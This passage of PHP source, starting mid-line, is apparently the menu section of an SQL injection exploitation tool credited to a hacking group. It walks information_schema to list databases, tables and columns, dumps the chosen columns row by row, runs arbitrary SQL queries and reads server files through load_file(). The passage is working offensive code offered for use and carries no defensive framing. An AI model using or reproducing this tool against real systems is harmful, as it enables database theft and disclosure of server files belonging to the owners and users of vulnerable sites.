] MAIN MENU"); puts("[1] Browse MySQL"); puts("[2] Run SQL Query"); puts("[3] Read file"); puts("[4] About"); puts("[0] Exit"); $resp = gets(); if($resp=="0") exit; elseif($resp=="1") { // pega dbs $i = 0; puts("[.] Getting databases:"); while(true) { $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1"); if($pega) puts(" - ".$pega); else break; $i++; } puts("[!] Current database: ".runquery("SELECT database()")); puts("[?] Enter database name for select:"); $own = array(); $own['db'] = gets(); $own['dbh'] = hex($own['db']); // pega tables da db $i = 0; puts("[.] Getting tables from $own[db]:"); while(true) { $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1"); if($pega) puts(" - ".$pega); else break; $i++; } puts("[?] Enter table name for select:"); $own['tb'] = gets(); $own['tbh'] = hex($own['tb']); // pega colunas da table $i = 0; puts("[.] Getting columns from $own[db].$own[tb]:"); while(true) { $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1"); if($pega) puts(" - ".$pega); else break; $i++; } puts("[?] Enter columns name, separated by commas (\",\") for select:"); $own['cl'] = explode(",", gets()); // pega dados das colunas foreach($own['cl'] as $coluna) { $i = 0; puts("[=] Column: $coluna"); while(true) { $pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1"); if($pega) { puts(" - $pega"); $i++; } else break; } echo "\n[ ] -+-\n"; } main(); } elseif($resp=="2") { puts("[~] RUN SQL QUERY"); puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat()."); puts("[?] Query (enter for exit): "); $query = gets(); if(!$query) main(); else main(runquery($query."\n")); } elseif($resp=="3") { puts("[?] File path (may not have priv):"); $file = hex(gets()); $le = runquery("SELECT load_file($file) AS wc"); if($le) main($le); else main("File not found, empty or no priv!"); } elseif($resp=="4") { puts("Coded by 0KaL @ WhiteCollarGroup"); puts("tinyurl.com/WCollarGroup"); main(); } else main("[!] Wrong choice."); } main();